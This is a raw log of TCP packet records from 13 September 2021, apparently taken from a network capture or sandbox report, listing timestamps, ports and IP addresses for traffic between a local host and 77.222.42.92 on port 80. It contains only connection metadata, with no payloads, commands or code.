Sep 13, 2021 15:55:33.732847929 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732979059 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732981920 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732985020 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732986927 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732990026 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732991934 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732995033 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.732996941 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733000040 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733002901 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733006001 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733007908 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733011007 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733012915 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733016014 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733017921 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733021021 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733023882 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733026981 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733030081 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733032942 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.733036041 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.805628061 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805670977 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805692911 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805715084 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805736065 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805757999 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805779934 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805793047 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.805802107 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805823088 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805847883 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805865049 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.805869102 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805890083 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805893898 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.805912018 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805928946 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.805933952 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805954933 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805958033 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.805972099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805993080 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.805999994 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806010962 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806032896 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806037903 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806057930 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806061983 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806081057 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806101084 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806102991 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806122065 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806140900 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806143045 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806164026 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806184053 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806185007 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806204081 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806207895 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806232929 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806233883 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806255102 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806273937 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806296110 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806299925 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806305885 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806315899 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806335926 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806337118 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806358099 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806371927 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806380033 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806399107 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806404114 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806426048 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806433916 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806446075 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806456089 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806467056 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806487083 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806489944 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806507111 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806523085 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806528091 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806550026 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806566000 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806575060 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806596041 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806597948 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806617022 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806627035 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806638956 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806659937 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806667089 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806679964 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806700945 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806703091 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806721926 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806727886 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806746006 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806761026 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806767941 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806788921 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806794882 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806808949 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806828976 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806829929 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806850910 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806870937 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806871891 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806894064 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806896925 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806916952 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806931973 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806940079 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806958914 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806967974 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.806989908 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.806998968 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807012081 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807032108 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807051897 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807051897 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807056904 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807073116 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807090044 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807096958 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807132959 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807159901 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807182074 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807183027 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807204008 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807205915 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807224035 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807245016 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807245016 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807257891 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807265997 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807285070 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807291031 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807313919 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807317972 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807333946 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807341099 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807352066 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807369947 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807388067 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807393074 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807410002 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807427883 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807432890 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807451963 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807456017 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807487011 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807732105 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807754993 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807776928 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807797909 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807806015 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807837963 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807898998 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807921886 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807940960 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807944059 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807966948 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.807977915 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.807992935 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808002949 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808054924 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808062077 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808077097 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808096886 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808096886 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808119059 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808121920 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808140039 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808161020 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808173895 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808195114 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808212996 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808213949 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808233976 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808254957 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808262110 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808275938 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808296919 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808307886 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808319092 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808341980 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808347940 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808363914 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808384895 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808406115 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808425903 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808442116 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808459044 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808480978 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808490038 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808497906 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808500051 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808501959 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808522940 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808540106 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808547020 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808571100 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808573961 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808592081 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808592081 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808613062 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808630943 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808634043 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808654070 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808662891 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808676958 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808697939 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808701038 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808722019 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808737993 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808743954 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808764935 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808787107 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808789015 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808808088 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808830976 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808852911 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808866978 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808871031 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808881998 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808892965 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808907032 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808933020 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808938026 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808948040 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808960915 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808964014 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808973074 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808985949 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.808986902 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.808999062 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809014082 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809026957 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809027910 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809043884 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809057951 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809058905 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809072971 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809087038 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809087992 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809099913 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809118986 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809122086 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809144020 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809151888 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809165955 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809180021 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809186935 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809207916 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809222937 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809228897 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809253931 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809261084 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809276104 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809292078 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809297085 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809314966 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809319973 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809336901 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809355021 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809360981 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809382915 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809390068 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809403896 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809425116 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.809436083 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.809539080 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.883955002 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884001017 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884031057 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884032965 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884054899 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884064913 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884078979 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884094954 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884099960 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884125948 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884149075 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884156942 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884187937 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884206057 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884211063 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884249926 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884268045 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884283066 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884306908 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884314060 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884325027 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884347916 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884354115 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884378910 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884382010 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884407043 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884428978 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884433985 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884454966 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884457111 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884478092 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884480000 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884500980 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884504080 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884527922 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884527922 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884557009 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884557962 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884583950 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884588957 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884613037 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884622097 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884635925 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884635925 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884658098 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884670019 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884680033 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884702921 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884710073 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884737968 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884741068 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884766102 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884777069 CEST	49759	80	192.168.2.4	77.222.42.92
Sep 13, 2021 15:55:33.884788990 CEST	80	49759	77.222.42.92	192.168.2.4
Sep 13, 2021 15:55:33.884812117 CEST	80	49759	77.222.42.92	192.168.2.4
